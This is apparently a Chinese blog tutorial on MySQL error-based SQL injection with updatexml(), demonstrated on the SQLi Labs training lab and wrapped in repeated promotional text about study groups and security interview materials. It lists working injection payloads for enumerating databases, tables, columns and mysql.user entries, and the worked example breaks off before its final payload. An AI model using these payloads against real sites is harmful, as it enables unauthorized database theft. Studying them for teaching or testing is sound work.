网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
测试网站的功能很简单:根据id查询用户名和名:
执行流程分为三步:
- 用户输入参数(用户id)
- 后台执行SQL(查询用户信息)
- 查询结果在前端回显
明白网站的功能逻辑以后,我们来了解一下报错注入的核心:updatexml()
2. 报错函数
MySQL提供了一个 updatexml() 函数,当第二个参数包含特殊符号时会报错,并将第二个参数的内容显示在报错信息中。
我们尝试在查询用户id的同时,使用报错函数,在地址栏输入:?id=1' and updatexml(1, 0x7e, 3) -- a
提示:0x7e
等价于 ~
;updatexml() 需要MySQL5.1及以上版本。
参数2包含特殊符号 ~
,触发数据库报错,并将参数2的内容显示在报错信息中。
3. 拼接查询结果
如果我们在参数2的位置,将查询语句和特殊符号拼接在一起,就可以将查询结果显示在报错信息中,在地址栏中输入:
?id=1' and updatexml(1, concat(0x7e,version()), 3) -- a
参数2内容中的查询结果显示在数据库的报错信息中,并回显到页面。
提示:
- version():返回数据库版本
- concat():拼接特殊符号和查询结果,函数使用方式可以参考我的另一篇博客:MySQL concat函数使用详解
4. 长度限制
updatexml() 函数的报错内容长度不能超过32个字符,常用的解决方式有两种:
- limit 分页
- substr()截取字符
4.1 limit 分页
以查询数据库用户为例:
?id=-1' and updatexml(1,concat(0x7e,
(select user
from mysql.user limit 1,1)
),3) -- a
4.2 substr()截取字符
以查询数据库用户为例:
?id=-1' and updatexml(1,concat(0x7e,
substr(
(select group_concat(user)
from mysql.user)
, 1 , 31)
),3) -- a
理解报错注入的执行原理后,我们整理一下报错注入的步骤。
三、步骤总结
适用情况:页面有数据库的报错信息
报错信息必须是动态的、来自数据库的报错信息。
网站写死的、自定义的报错提示不算。
1. 判断是否报错
参数中添加单/双引号,页面报错才可进行下一步。
?id=1' -- a
2. 判断报错条件
参数中添加报错函数,检查报错信息是否正常回显
?id=1' and updatexml(1,'~',3) -- a
3. 脱库
获取所有数据库
?id=-1' and updatexml(1,concat('~',
substr(
(select group_concat(schema_name)
from information_schema.schemata)
, 1 , 31)
),3) -- a
获取所有表
?id=1' and updatexml(1,concat('~',
substr(
(select group\_concat(table\_name)
from information\_schema.tables
where table\_schema = 'security')
, 1 , 31)
),3) -- a
获取所有字段
?id=1' and updatexml(1,concat('~',
substr(
(select group\_concat(column\_name)
from information\_schema.columns
where table\_schema = 'security' and table\_name = 'users')
, 1 , 31)
),3) -- a
四、实战案例
我们拿上面的测试网站(SQLi Labs 第一关)来举例,添加单引号查看是否报错,地址栏输入 ?id=1'
页面出现数据库的报错信息,适合使用报错注入,接下来,获取数据库用户的密码,地址栏输入:
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!
王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。
对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
【完整版领取方式在文末!!】
93道网络安全面试题
内容实在太多,不一一截图了
黑客学习资源推荐
最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
1️⃣零基础入门
① 学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
② 路线对应学习视频
同时每个成长路线对应的板块都有配套的视频提供:
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。
一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!